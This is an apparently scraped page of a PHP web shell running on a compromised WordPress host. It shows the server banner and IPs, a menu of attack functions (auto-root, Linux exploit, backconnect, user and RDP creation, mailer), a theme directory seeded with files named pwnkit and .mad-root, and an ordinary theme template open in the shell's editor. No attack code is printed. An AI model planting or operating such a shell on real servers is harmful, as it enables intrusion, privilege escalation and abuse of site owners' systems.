Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
shapely /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
404.php
845
B
-rw-r--r--
Gruntfile.js
3.73
KB
-rw-r--r--
README.md
1.97
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive-jetpack-portfolio.php
2.53
KB
-rw-r--r--
archive.php
1.2
KB
-rw-r--r--
attachment.php
920
B
-rw-r--r--
changelog.txt
5.34
KB
-rw-r--r--
comments.php
3.1
KB
-rw-r--r--
footer.php
1.12
KB
-rw-r--r--
functions.php
9.4
KB
-rw-r--r--
header.php
3.17
KB
-rw-r--r--
index.php
1.32
KB
-rw-r--r--
package.json
550
B
-rw-r--r--
page.php
1.16
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
5.13
KB
-rw-r--r--
rtl.css
367
B
-rw-r--r--
screenshot.png
1.04
MB
-rw-r--r--
search.php
1.43
KB
-rw-r--r--
sidebar-footer.php
1.32
KB
-rw-r--r--
sidebar.php
420
B
-rw-r--r--
single-jetpack-portfolio.php
1
KB
-rw-r--r--
single.php
906
B
-rw-r--r--
style.css
90.97
KB
-rw-r--r--
woocommerce.php
331
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : archive-jetpack-portfolio.php
<?php get_header(); $layout = get_theme_mod( 'projects_layout_view', 'mansonry' ); $layout_class = shapely_get_layout_class(); $item_classes = 'post-snippet col-md-3 col-sm-6 project'; if ( 'mansonry' == $layout ) { $item_classes .= ' masonry-item'; } if ( 'sidebar-left' == $layout_class ) : get_sidebar(); endif; ?> <div id="primary" class="content-area col-md-8 mb-xs-24 <?php echo esc_attr( $layout_class ); ?>"> <main id="main" class="site-main" role="main"> <?php if ( have_posts() ) : ?> <?php if ( 'mansonry' == $layout ) : ?> <div class="masonry-loader fixed-center"> <div class="col-sm-12 text-center"> <div class="spinner"></div> </div> </div> <?php endif ?> <div class="<?php echo 'mansonry' == $layout ? 'masonry masonryFlyIn' : ''; ?>"> <?php /* Start the Loop */ while ( have_posts() ) : the_post(); $projects_args = array( 'fields' => 'names', ); $project_types = wp_get_post_terms( $post->ID, 'jetpack-portfolio-type', $projects_args ); $thumbnail_url = get_the_post_thumbnail_url( get_the_ID(), 'full' ); $item_style = ''; if ( 'mansonry' != $layout ) { $item_style = 'background-image: url(' . $thumbnail_url . ')'; } ?> <article id="post-<?php the_ID(); ?>" <?php post_class( $item_classes ); ?>> <div class="image-tile inner-title hover-reveal text-center" style="<?php echo $item_style; ?>"> <?php if ( has_post_thumbnail() ) { $portfolio_custom_url = get_post_meta( get_the_ID(), 'shapely_companion_portfolio_link', true ); if ( ! $portfolio_custom_url ) { $portfolio_custom_url = get_the_permalink(); } ?> <a href="<?php echo esc_url( $portfolio_custom_url ); ?>" title="<?php the_title_attribute(); ?>"> <?php if ( 'mansonry' == $layout ) { the_post_thumbnail( 'medium' ); } ?> <div class="title"> <?php the_title( '<h5 class="mb0">', '</h5>' ); if ( ! empty( $project_types ) ) { echo '<span>' . implode( ' / ', $project_types ) . '</span>'; } ?> </div> </a> <?php } ?> </div> </article><!-- #post-## --> <?php endwhile; the_posts_navigation(); else : get_template_part( 'template-parts/content', 'none' ); endif; ?> </main><!-- #main --> </div><!-- #primary --> <?php if ( 'sidebar-right' == $layout_class ) : get_sidebar(); endif; get_footer();
Close